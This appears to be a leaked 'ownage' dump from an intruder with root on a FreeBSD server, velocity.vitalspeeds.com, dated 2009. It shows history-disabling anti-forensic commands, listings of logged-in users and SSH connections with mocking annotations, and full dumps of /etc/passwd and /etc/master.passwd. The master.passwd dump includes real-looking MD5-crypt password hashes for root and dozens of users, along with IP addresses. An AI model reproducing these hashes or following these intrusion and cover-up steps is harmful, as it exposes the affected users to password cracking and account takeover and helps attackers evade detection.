yaquis           p1       ip72-223-92-235.  6:12PM     - -bash (bash)


[root@velocity:~]# export HISTSIZE=0
[root@velocity:~]# export HISTFILE=/dev/null
[root@velocity:~]# env
TERM=vt100
SHELL=/usr/local/bin/bash
HISTSIZE=1500
SSH_CLIENT=1.3.3.7 6173 22
SSH_TTY=/dev/ttyp1
USER=root
SSH_AUTH_SOCK=/tmp/ssh-M0YqjqZvAN/agent.70342
PAGER=more
LSCOLORS=ExGxFxf5CxfgDxabagacad
MAIL=/var/mail/root
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/X11R6/bin
PWD=/root
EDITOR=pico
PS1=[\u@\h:\w]\$ 
SHLVL=1
HOME=/root
LOGNAME=root
SSH_CONNECTION=1.3.3.7 6173 72.20.28.205 22
HISTFILE=/dev/null
_=/usr/bin/env
[root@velocity:~]# w
 7:36PM  up 513 days,  8:04, 2 users, load averages: 0.43, 0.48, 0.43
USER             TTY      FROM              LOGIN@  IDLE WHAT
romeo            p9       :ttypf:S.0       Wed06AM     1 irssi -h absolute.ownage.net
pimpinjg         pe       cpe-76-175-20-18 Mon09PM  1:15 irssi -h 72.20.28.206 // points to copyandpaste.info
[root@velocity:/]# date
Tue Jun 23 20:30:52 CDT 2009
[root@velocity:/]# uname -a
FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 FreeBSD 6.2-RELEASE-p3 #0: Sun Apr 15 19:59:55 PDT 2007     root@velocity.vitalspeeds.com:/usr/obj/usr/src/sys/VITAL  i386

[root@velocity:~]# sysctl -a | egrep -i 'hw.machine|hw.model|hw.ncpu'
hw.machine: i386
hw.model: Intel(R) Pentium(R) 4 CPU 2.80GHz
hw.ncpu: 1
hw.machine_arch: i386


[root@velocity:~]# ls -la
total 72
drwxr-xr-x   6 root  wheel   512 Jun 26 02:08 ./
drwxr-xr-x  21 root  wheel   512 Nov  5  2008 ../
-rw-------   1 root  wheel  4356 Jun 11 08:02 .bash_history
-rw-r--r--   2 root  wheel   801 Jan 12  2007 .cshrc
-rw-------   1 root  wheel     5 Apr 15  2007 .history
drwx------   2 root  wheel   512 Jun 11 10:25 .irssi/
-rw-r--r--   1 root  wheel   143 Jan 12  2007 .k5login
-rw-------   1 root  wheel    35 Jun 25 16:35 .lesshst
-rw-r--r--   1 root  wheel   293 Jan 12  2007 .login
-rw-------   1 root  wheel  2164 Jun 23 20:21 .lsof_velocity
-rw-r--r--   2 root  wheel   251 Jan 12  2007 .profile
drwx------   2 root  wheel   512 Apr 13  2007 .ssh/
drwxr-xr-x   2 root  wheel   512 Jun 24 18:00 kernels/
drwxr-xr-x   2 root  wheel   512 Nov  5  2008 supfiles/
-rwxr--r--   1 root  wheel   477 Nov  5  2008 update.sh*

[root@velocity:~]# lsof -i -n | grep ssh
sshd      43929      devil    3u  IPv4 0xca224000      0t0  TCP *:search (LISTEN)
sshd      43929      devil    5u  IPv6 0xca6b5cb0      0t0  TCP *:search (LISTEN)
sshd      43929      devil    7u  IPv4 0xca0653a0      0t0  TCP 72.20.3.98:search->189.158.227.97:1036 (ESTABLISHED)
sshd      43929      devil   87u  IPv4 0xcafd2570      0t0  TCP 72.20.28.196:51129->69.16.172.40:afs3-fileserver (ESTABLISHED)
sshd      43929      devil  154u  IPv4 0xc98913a0      0t0  TCP 72.20.28.210:52054->82.196.213.250:ircd (ESTABLISHED)
sshd      43929      devil  167u  IPv4 0xcc5a73a0      0t0  TCP 72.20.28.196:49651->84.208.29.17:afs3-fileserver (ESTABLISHED)
sshd      43929      devil  192u  IPv4 0xcb023910      0t0  TCP 72.20.28.196:50866->69.16.172.34:afs3-fileserver (ESTABLISHED)
sshd      60220       root    3u  IPv4 0xc92c9000      0t0  TCP 72.20.28.248:ssh->188.52.81.126:10662 (ESTABLISHED) // RoMeO Saudi Arabia
sshd      60382       root    3u  IPv4 0xc50a51d0      0t0  TCP 72.20.28.248:ssh->188.52.81.126:10696 (ESTABLISHED)
sshd      64492       root    3u  IPv6 0xcc1883a0      0t0  TCP *:ssh (LISTEN)
sshd      64492       root    4u  IPv4 0xc970d3a0      0t0  TCP *:ssh (LISTEN)
sshd      74777       root    3u  IPv4 0xc9dd8570      0t0  TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
sshd      74779     ioplex    3u  IPv4 0xc9dd8570      0t0  TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
sshd      74779     ioplex    7u  IPv4 0xc9f58cb0      0t0  TCP 127.0.0.1:56073->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex    8u  IPv4 0xc91ff1d0      0t0  TCP 127.0.0.1:57500->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex    9u  IPv4 0xc6230910      0t0  TCP 127.0.0.1:64660->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   10u  IPv4 0xc9a37ae0      0t0  TCP 127.0.0.1:49761->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   12u  IPv4 0xc9a93740      0t0  TCP 127.0.0.1:64920->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   13u  IPv4 0xc97d21d0      0t0  TCP 127.0.0.1:52350->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   14u  IPv4 0xc5c30000      0t0  TCP 127.0.0.1:51650->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   15u  IPv4 0xca1cf1d0      0t0  TCP 127.0.0.1:49153->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   16u  IPv4 0xcc1731d0      0t0  TCP 127.0.0.1:51808->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   17u  IPv4 0xcc592cb0      0t0  TCP 127.0.0.1:53451->127.0.0.1:48259 (ESTABLISHED)
[root@velocity:~]# 

[root@velocity:/var/run]# cat /etc/passwd 
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
nsc:*:1001:0:User &:/home/nsc:/bin/sh
sysc:*:1002:1002:User &:/home/sysc:/usr/local/bin/bash
vividbreeze:*:1003:1003:User &:/home/vividbreeze:/usr/local/bin/bash
sharpie:*:1036:1036:User &:/home/sharpie:/usr/local/bin/bash
cappy57:*:1038:1038:User &:/home/cappy57:/usr/local/bin/bash
zoo:*:1039:1039:User &:/home/zoo:/usr/local/bin/bash
dark:*:1041:1041:User &:/home/dark:/usr/local/bin/bash
evino:*:1042:1042:User &:/home/evino:/usr/local/bin/bash
dano30:*:1043:1043:User &:/home/dano30:/usr/local/bin/bash
daali:*:1044:1044:User &:/home/daali:/usr/local/bin/bash
skit:*:1045:1045:User &:/home/skit:/usr/local/bin/bash
l33t:*:1047:1047:User &:/home/l33t:/usr/local/bin/bash
tlm:*:1049:1049:User &:/home/tlm:/usr/local/bin/bash
itzkorn:*:1051:1051:User &:/home/itzkorn:/usr/local/bin/bash
groove:*:1052:1052:User &:/home/groove:/usr/local/bin/bash
en0prcv:*:1054:1054:User &:/home/en0prcv:/usr/local/bin/bash
poolboy:*:1055:1055:User &:/home/poolboy:/usr/local/bin/bash
bollox:*:1058:1058:User &:/home/bollox:/usr/local/bin/bash
vamp:*:1059:1059:User &:/home/vamp:/usr/local/bin/bash
genosyde:*:1060:1060:User &:/home/genosyde:/usr/local/bin/bash
y2j:*:1061:1061:User &:/home/y2j:/usr/local/bin/bash
katsst:*:1062:1062:User &:/home/katsst:/usr/local/bin/bash
nexxtea:*:1063:1063:User &:/home/nexxtea:/usr/local/bin/bash
quinn:*:1064:1064:User &:/home/quinn:/usr/local/bin/bash
crash:*:1066:1066:User &:/home/crash:/usr/local/bin/bash
safety:*:1067:1067:User &:/home/safety:/usr/local/bin/bash
crazyl:*:1069:1069:User &:/home/crazyl:/usr/local/bin/bash
tarawa:*:1071:1071:User &:/home/tarawa:/usr/local/bin/bash
athemp:*:1077:1077:User &:/home/athemp:/usr/local/bin/bash
cazz1961:*:1087:1087:User &:/home/cazz1961:/usr/local/bin/bash
vitalrbj:*:1088:1088:User &:/home/vitalrbj:/usr/local/bin/bash
digitalman:*:1090:1090:User &:/home/digitalman:/usr/local/bin/bash
timgor:*:1096:1096:User &:/home/timgor:/usr/local/bin/bash
techi3:*:1098:1098:User &:/home/techi3:/usr/local/bin/bash
apo:*:1099:1099:User &:/home/apo:/usr/local/bin/bash
blkgraz:*:1100:1100:User &:/home/blkgraz:/usr/local/bin/bash
jamesn:*:1101:1101:User &:/home/jamesn:/usr/local/bin/bash
sacred:*:1103:1103:User &:/home/sacred:/usr/local/bin/bash
jschultk:*:1104:1104:User &:/home/jschultk:/usr/local/bin/bash
narcissu:*:1105:1105:User &:/home/narcissu:/usr/local/bin/bash
neohax:*:1115:1115:User &:/home/neohax:/usr/local/bin/bash
ceejay:*:1119:1119:User &:/home/ceejay:/usr/local/bin/bash
wolf:*:1126:1126:User &:/home/wolf:/usr/local/bin/bash
warlordz:*:1129:1129:User &:/home/warlordz:/usr/local/bin/bash
hh360:*:1130:1130:User &:/home/hh360:/usr/local/bin/bash
simonbh:*:1133:1133:User &:/home/simonbh:/usr/local/bin/bash
crazie:*:1134:1134:User &:/home/crazie:/bin/tcsh
burnt:*:1136:1136:User &:/home/burnt:/usr/local/bin/bash
xckx:*:1139:1139:User &:/home/xckx:/bin/sh
f3d0r:*:1140:1140:User &:/home/f3d0r:/usr/local/bin/bash
khicks:*:1145:1145:User &:/home/khicks:/usr/local/bin/bash
schlomer:*:1147:1147:User &:/home/schlomer:/usr/local/bin/bash
nodex:*:1153:1153:User &:/home/nodex:/usr/local/bin/bash
crrj13:*:1155:1155:User &:/home/crrj13:/usr/local/bin/bash
dravas:*:1157:1157:User &:/home/dravas:/usr/local/bin/bash
sinistro:*:1170:1170:User &:/home/sinistro:/usr/local/bin/bash
izedd:*:1172:1172:User &:/home/izedd:/usr/local/bin/bash
chevym4n:*:1174:1174:User &:/home/chevym4n:/usr/local/bin/bash
edgein:*:1175:1175:User &:/home/edgein:/usr/local/bin/bash
shoes:*:1178:1178:User &:/home/shoes:/usr/local/bin/bash
zenchi:*:1179:1179:User &:/home/zenchi:/usr/local/bin/bash
darien9:*:1180:1180:User &:/home/darien9:/usr/local/bin/bash
reaper90:*:1181:1181:User &:/home/reaper90:/usr/local/bin/bash
bnoel:*:1183:1183:User &:/home/bnoel:/usr/local/bin/bash
hts:*:1188:1188:User &:/home/hts:/usr/local/bin/bash
hw4tbnc:*:1190:1190:User &:/home/hw4tbnc:/usr/local/bin/bash
xavi:*:1192:1192:User &:/home/xavi:/usr/local/bin/bash
kruapra:*:1193:1193:User &:/home/kruapra:/usr/local/bin/bash
bbblade1:*:1197:1197:User &:/home/bbblade1:/usr/local/bin/bash
oby1:*:1198:1198:User &:/home/oby1:/usr/local/bin/bash
ltootle:*:1199:1199:User &:/home/ltootle:/usr/local/bin/bash
zime:*:1200:1200:User &:/home/zime:/usr/local/bin/bash
ksafusi:*:1202:1202:User &:/home/ksafusi:/usr/local/bin/bash
methanl:*:1205:1205:User &:/home/methanl:/usr/local/bin/bash
anux:*:1206:1206:User &:/home/anux:/usr/local/bin/bash
tea:*:1207:1207:User &:/home/tea:/usr/local/bin/bash
ircjaymz:*:1210:1210:User &:/home/ircjaymz:/usr/local/bin/bash
coolcat:*:1211:1211:User &:/home/coolcat:/usr/local/bin/bash
zeepysea:*:1213:1213:User &:/home/zeepysea:/usr/local/bin/bash
darkevil:*:1214:1214:User &:/home/darkevil:/usr/local/bin/bash
grindey:*:1215:1215:User &:/home/grindey:/usr/local/bin/bash
silver15:*:1216:1216:User &:/home/silver15:/usr/local/bin/bash
smash:*:1218:1218:User &:/home/smash:/usr/local/bin/bash
reznik:*:1219:1219:User &:/home/reznik:/usr/local/bin/bash
omelette:*:1222:1222:User &:/home/omelette:/usr/local/bin/bash
mimik0r:*:1223:1223:User &:/home/mimik0r:/usr/local/bin/bash
owine:*:1224:1224:User &:/home/owine:/usr/local/bin/bash
manboo:*:1225:1225:User &:/home/manboo:/usr/local/bin/bash
corley:*:1231:1231:User &:/home/corley:/usr/local/bin/bash
sqd:*:1233:1233:User &:/home/sqd:/usr/local/bin/bash
mooo:*:1234:1234:User &:/home/mooo:/usr/local/bin/bash
comedy:*:1235:1235:User &:/home/comedy:/usr/local/bin/bash
lynx:*:1236:1236:User &:/home/lynx:/usr/local/bin/bash
prodigy:*:1237:1237:User &:/home/prodigy:/usr/local/bin/bash
chrirc:*:1238:1238:User &:/home/chrirc:/usr/local/bin/bash
lyhne1:*:1242:1242:User &:/home/lyhne1:/usr/local/bin/bash
percott1:*:1243:1243:User &:/home/percott1:/usr/local/bin/bash
djspark:*:1244:1244:User &:/home/djspark:/usr/local/bin/bash
ac1115:*:1246:1246:User &:/home/ac1115:/usr/local/bin/bash
asriel:*:1247:1247:User &:/home/asriel:/usr/local/bin/bash
devil:*:1248:1248:User &:/home/devil:/usr/local/bin/bash
lymelyte:*:1249:1249:User &:/home/lymelyte:/usr/local/bin/bash
cmm:*:1250:1250:User &:/home/cmm:/usr/local/bin/bash
nek0o:*:1252:1252:User &:/home/nek0o:/usr/local/bin/bash
baxxta:*:1253:1253:User &:/home/baxxta:/usr/local/bin/bash
bruhaha:*:1254:1254:User &:/home/bruhaha:/usr/local/bin/bash
dv327:*:1258:1258:User &:/home/dv327:/usr/local/bin/bash
voxitize:*:1261:1261:User &:/home/voxitize:/usr/local/bin/bash
own3d:*:1262:1262:User &:/home/own3d:/usr/local/bin/bash
feed:*:1264:1264:User &:/home/feed:/usr/local/bin/bash
yaquis:*:1266:1266:User &:/home/yaquis:/usr/local/bin/bash
bpunux:*:1269:1269:User &:/home/bpunux:/usr/local/bin/bash
skypilot:*:1271:1271:User &:/home/skypilot:/usr/local/bin/bash
blake96:*:1272:1272:User &:/home/blake96:/usr/local/bin/bash
blotch:*:1274:1274:User &:/home/blotch:/usr/local/bin/bash
scouse:*:1275:1275:User &:/home/scouse:/usr/local/bin/bash
mogle3:*:1276:1276:User &:/home/mogle3:/usr/local/bin/bash
ste:*:1277:1277:User &:/home/ste:/usr/local/bin/bash
omgwtf:*:1281:1281:User &:/home/omgwtf:/usr/local/bin/bash
brosb4:*:1283:1283:User &:/home/brosb4:/usr/local/bin/bash
mindben:*:1284:1284:User &:/home/mindben:/usr/local/bin/bash
hixk:*:1286:1286:User &:/home/hixk:/usr/local/bin/bash
omen:*:1287:1287:User &:/home/omen:/usr/local/bin/bash
sakik1:*:1290:1290:User &:/home/sakik1:/usr/local/bin/bash
chriys:*:1291:1291:User &:/home/chriys:/usr/local/bin/bash
jtracy:*:1292:1292:User &:/home/jtracy:/usr/local/bin/bash
roodyk:*:1293:1293:User &:/home/roodyk:/usr/local/bin/bash
qfx:*:1295:1295:User &:/home/qfx:/usr/local/bin/bash
chrisdad:*:1296:1296:User &:/home/chrisdad:/usr/local/bin/bash
rice21:*:1298:1298:User &:/home/rice21:/usr/local/bin/bash
wchan21:*:1299:1299:User &:/home/wchan21:/usr/local/bin/bash
xkelsx:*:1300:1300:User &:/home/xkelsx:/usr/local/bin/bash
jerryste:*:1302:1302:User &:/home/jerryste:/usr/local/bin/bash
pbx:*:1303:1303:User &:/home/pbx:/usr/local/bin/bash
mlh:*:1307:1307:User &:/home/mlh:/usr/local/bin/bash
howell1:*:1308:1308:User &:/home/howell1:/usr/local/bin/bash
djkarl:*:1309:1309:User &:/home/djkarl:/usr/local/bin/bash
subkult:*:1310:1310:User &:/home/subkult:/usr/local/bin/bash
dealer:*:1311:1311:User &:/home/dealer:/bin/sh
cont:*:1312:1312:User &:/home/cont:/usr/local/bin/bash
ircusr:*:1313:1313:User &:/home/ircusr:/usr/local/bin/bash
lordy:*:1314:1314:User &:/home/lordy:/usr/local/bin/bash
chozen1:*:1315:1315:User &:/home/chozen1:/usr/local/bin/bash
nardi:*:1316:1316:User &:/home/nardi:/usr/local/bin/bash
ssaws:*:1317:1317:User &:/home/ssaws:/usr/local/bin/bash
chaos1:*:1318:1318:User &:/home/chaos1:/usr/local/bin/bash
jax66:*:1319:1319:User &:/home/jax66:/usr/local/bin/bash
paleride:*:1320:1320:User &:/home/paleride:/usr/local/bin/bash
kokoryu:*:1321:1321:User &:/home/kokoryu:/usr/local/bin/bash
bluewish:*:1322:1322:User &:/home/bluewish:/usr/local/bin/bash
grumpy:*:1323:1323:User &:/home/grumpy:/usr/local/bin/bash
jaiven:*:1324:1324:jusam69:/home/jaiven:/usr/local/bin/bash
rikt:*:1325:1325:User &:/home/rikt:/usr/local/bin/bash
sal:*:1326:1326:User &:/home/sal:/usr/local/bin/bash
lailoke:*:1327:1327:User &:/home/lailoke:/usr/local/bin/bash
kingzy:*:1328:1328:User &:/home/kingzy:/usr/local/bin/bash
delion1:*:1329:1329:User &:/home/delion1:/usr/local/bin/bash
vietnigh:*:1330:1330:User &:/home/vietnigh:/usr/local/bin/bash
darkuno3:*:1331:1331:User &:/home/darkuno3:/usr/local/bin/bash
mae21:*:1332:1332:User &:/home/mae21:/usr/local/bin/bash
redrum:*:1333:1333:User &:/home/redrum:/usr/local/bin/bash
cpu:*:1334:1334:User &:/home/cpu:/usr/local/bin/bash
cassand:*:1335:1335:User &:/home/cassand:/usr/local/bin/bash
nyakz:*:1336:1336:User &:/home/nyakz:/usr/local/bin/bash
ioplex:*:1337:1337:User &:/home/ioplex:/usr/local/bin/bash
dasboot:*:1338:1338:User &:/home/dasboot:/usr/local/bin/bash
visage:*:1339:1339:User &:/home/visage:/usr/local/bin/bash
brosco:*:1340:1340:User &:/home/brosco:/usr/local/bin/bash
mrts:*:1341:1341:User &:/home/mrts:/usr/local/bin/bash
qberto:*:1342:1342:User &:/home/qberto:/usr/local/bin/bash
kooner:*:1343:1343:User &:/home/kooner:/usr/local/bin/bash
matt:*:1344:1344:User &:/home/matt:/usr/local/bin/bash
alexbb:*:1345:1345:User &:/home/alexbb:/usr/local/bin/bash
psycoz:*:1346:1346:User &:/home/psycoz:/usr/local/bin/bash
brex132:*:1347:1347:User &:/home/brex132:/usr/local/bin/bash
romeo:*:1348:1348:User &:/home/romeo:/usr/local/bin/bash 	// Luv birdz
pimpinjg:*:1349:1349:pimp:/home/pimpinjg:/usr/local/bin/bash	      xxx

[root@velocity:/var/run]# cat /etc/master.passwd 
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:$1$1/uC7r58$sAPSn.PUGsvyFIu4mcOIF.:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
toor:$1$IuvLkk7/$FgGjVLe5lsy07I5kDUC/T0:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
nsc:$1$IeIWCi46$XUYbzB6VMUjyo3yVDocI20:1001:0::0:0:User &:/home/nsc:/bin/sh
sysc:$1$hiSG4Zk5$DRLSxZFui5GLPwdZoHRXa/:1002:1002::0:0:User &:/home/sysc:/usr/local/bin/bash
vividbreeze:$1$HHTt39fS$BpffLFLjdrdFhiYRiT/oH1:1003:1003::0:0:User &:/home/vividbreeze:/usr/local/bin/bash
sharpie:$1$Z/fby1iX$U.ENzMwNSk.Ak1eEo8cdo1:1036:1036::0:0:User &:/home/sharpie:/usr/local/bin/bash
cappy57:$1$8gQtMpSY$4g39UeywbkYfv4t.BC1T0.:1038:1038::0:0:User &:/home/cappy57:/usr/local/bin/bash
zoo:$1$ikC.1RVM$vaW3geI2tKDiBuvM7/8H1/:1039:1039::0:0:User &:/home/zoo:/usr/local/bin/bash
dark:$1$sGGpg4L4$HYL2DV2DDtJrlDCsIk1fD0:1041:1041::0:0:User &:/home/dark:/usr/local/bin/bash
evino:$1$HDrVvLQn$D1cJvyXZzYWc71dnlB9jl.:1042:1042::0:0:User &:/home/evino:/usr/local/bin/bash
dano30:$1$ilxeqeAX$1.xdaXswIvjWdH4Es8U1U1:1043:1043::0:0:User &:/home/dano30:/usr/local/bin/bash
daali:$1$RIGXxrvu$loyclkpc.AmaZJ6z7RycD0:1044:1044::0:0:User &:/home/daali:/usr/local/bin/bash
skit:$1$YwEZ2Gg3$Mm9v5oPJpRUj5WbHGfiYI.:1045:1045::0:0:User &:/home/skit:/usr/local/bin/bash
l33t:$1$BuBrfoCp$YgayOH.nAWmkTT.kOi0340:1047:1047::0:0:User &:/home/l33t:/usr/local/bin/bash
tlm:$1$8qySBjLd$UvMl1Qi37S6HzW5.fgugN.:1049:1049::0:0:User &:/home/tlm:/usr/local/bin/bash
itzkorn:$1$WvELNoD3$FIKMODlyhN1RIxuNyM8gV0:1051:1051::0:0:User &:/home/itzkorn:/usr/local/bin/bash
groove:$1$U.nL9FBx$mxac7bOw5AcjMobjytLqT.:1052:1052::0:0:User &:/home/groove:/usr/local/bin/bash
en0prcv:$1$ml9.a1tV$4ysE/.CdLiEAYOtG6IzW2.:1054:1054::0:0:User &:/home/en0prcv:/usr/local/bin/bash
poolboy:$1$A5NPQSxN$X./Geraa6C3fLjbGv2j9h.:1055:1055::0:0:User &:/home/poolboy:/usr/local/bin/bash
bollox:$1$1CezJarC$OZn7O/jcjFQHzMxK80L0C0:1058:1058::0:0:User &:/home/bollox:/usr/local/bin/bash
vamp:$1$OdDSbp3S$VEOws1l9o/qV0i6Y2xiHC1:1059:1059::0:0:User &:/home/vamp:/usr/local/bin/bash
genosyde:$1$izdrjKv1$qyo9BMhEB0kCGUinWl/dr1:1060:1060::0:0:User &:/home/genosyde:/usr/local/bin/bash
y2j:$1$bzHRbq3a$04iFxtmEVuPEXbClBbUIM.:1061:1061::0:0:User &:/home/y2j:/usr/local/bin/bash
katsst:$1$XkKWd/C/$gu0Kf6fWZZylSX2kvZP0y/:1062:1062::0:0:User &:/home/katsst:/usr/local/bin/bash
nexxtea:$1$qiplCuym$aOcIJrBN7.ahK8fRpc5F.1:1063:1063::0:0:User &:/home/nexxtea:/usr/local/bin/bash
quinn:$1$WjY3BCta$pOR9R53lRcsn9uMHRj5mO.:1064:1064::0:0:User &:/home/quinn:/usr/local/bin/bash
crash:$1$ptyaMrnL$LfpP.5IoEVl6ASBLrZ7sw0:1066:1066::0:0:User &:/home/crash:/usr/local/bin/bash
safety:$1$IdkZ.lW5$31zeswPr/v9Gwn6qZTDt3.:1067:1067::0:0:User &:/home/safety:/usr/local/bin/bash
crazyl:$1$b6KKD5V2$0X.DEpoT8dnAV.2tkkSSQ/:1069:1069::0:0:User &:/home/crazyl:/usr/local/bin/bash
tarawa:$1$kogmLs28$TVHG.5aER1x3a/6fks6fv1:1071:1071::0:0:User &:/home/tarawa:/usr/local/bin/bash
athemp:*LOCKED*$1$yNQrxvZa$ndX97oZnZ.P29pYdLUDUX1:1077:1077::0:0:User &:/home/athemp:/usr/local/bin/bash
cazz1961:$1$tNbxmjSZ$0nG7YCqOLZZBu.rdFYNXg1:1087:1087::0:0:User &:/home/cazz1961:/usr/local/bin/bash
vitalrbj:$1$obXp9UmW$ASCrtvpO6SSYxAtC9/BgN1:1088:1088::0:0:User &:/home/vitalrbj:/usr/local/bin/bash
digitalman:$1$.uafD1mk$ZKCSAxQX05Bt8CR1vD0bI.:1090:1090::0:0:User &:/home/digitalman:/usr/local/bin/bash
timgor:$1$fV/Hdpqj$2sjgaBZs6L4cWkD8coayp1:1096:1096::0:0:User &:/home/timgor:/usr/local/bin/bash
techi3:$1$ynI1L3YX$lTwOx8CeuiBAbtCq2rXG2.:1098:1098::0:0:User &:/home/techi3:/usr/local/bin/bash
apo:$1$lgsvmKYS$kJ/vrigrNVEXtw8V3qA3K/:1099:1099::0:0:User &:/home/apo:/usr/local/bin/bash
blkgraz:$1$5q0v8Hnd$zACUwgVPinssVcu8I8Ouf0:1100:1100::0:0:User &:/home/blkgraz:/usr/local/bin/bash
jamesn:$1$0ZLHnfT0$mF2GuCKO5WcYOceupFee0/:1101:1101::0:0:User &:/home/jamesn:/usr/local/bin/bash
sacred:*LOCKED*$1$QBsL9qE8$9gAsuW0OK2OH2.UfBBD4n/:1103:1103::0:0:User &:/home/sacred:/usr/local/bin/bash
jschultk:$1$Ghq0DYN4$XO2MmdjnPzIkQT0nWFNi.0:1104:1104::0:0:User &:/home/jschultk:/usr/local/bin/bash
narcissu:$1$yPWcgSV9$K6b21WLz8VeolcK9x26mW1:1105:1105::0:0:User &:/home/narcissu:/usr/local/bin/bash
neohax:$1$BYHxfesg$7Vu8ktsSVk6FGgSMczVQG.:1115:1115::0:0:User &:/home/neohax:/usr/local/bin/bash
ceejay:*LOCKED*$1$sDhV37Ee$hKD5Ycjby19mEG3NYYIYo0:1119:1119::0:0:User &:/home/ceejay:/usr/local/bin/bash
wolf:$1$.MGFDwFE$jy3l9ohTEH1ykRgpGM1Q6.:1126:1126::0:0:User &:/home/wolf:/usr/local/bin/bash
warlordz:$1$uvxD1gWl$4fRmw..Z.wViXzw28Jlmu1:1129:1129::0:0:User &:/home/warlordz:/usr/local/bin/bash
hh360:$1$BRAG0RtG$iXnTwrCohVK8HOGAJohy10:1130:1130::0:0:User &:/home/hh360:/usr/local/bin/bash
simonbh:$1$97E2uBin$73LaITM/WELCrMAt682Z21:1133:1133::0:0:User &:/home/simonbh:/usr/local/bin/bash
crazie:$1$myYGtQTs$U52cfuiCDyksyWJbM55dx.:1134:1134::0:0:User &:/home/crazie:/bin/tcsh
burnt:$1$ykBWG.ZC$dfTn3m8koWfmAY1QHpx1R0:1136:1136::0:0:User &:/home/burnt:/usr/local/bin/bash
xckx:*LOCKED*$1$7mjlMrC7$j/ZtDnWpTeAgxJl4jrPPV1:1139:1139::0:0:User &:/home/xckx:/bin/sh
f3d0r:*LOCKED*$1$9K1FP6Bz$KDznsL2Eh9l3ljez.qoif/:1140:1140::0:0:User &:/home/f3d0r:/usr/local/bin/bash
khicks:$1$VzHaJyrH$0m/NnKHiTrFY..8zhbaLq0:1145:1145::0:0:User &:/home/khicks:/usr/local/bin/bash
schlomer:*LOCKED*$1$iBBpx5BZ$LjFBxe10UsUGETx8AZfiP0:1147:1147::0:0:User &:/home/schlomer:/usr/local/bin/bash
nodex:$1$Q518nSu7$4WszHno7Bi4NymOySGq1a0:1153:1153::0:0:User &:/home/nodex:/usr/local/bin/bash
crrj13:$1$m4PUs5Ia$3tsRV7DZyj3fLxjHK9.AX0:1155:1155::0:0:User &:/home/crrj13:/usr/local/bin/bash
dravas:$1$hTXK1nl7$0WoSi2Md.l7h/eM2uQCp5.:1157:1157::0:0:User &:/home/dravas:/usr/local/bin/bash
sinistro:$1$rt7kcwvQ$xe2ixfObxehOHLzoILyVF.:1170:1170::0:0:User &:/home/sinistro:/usr/local/bin/bash
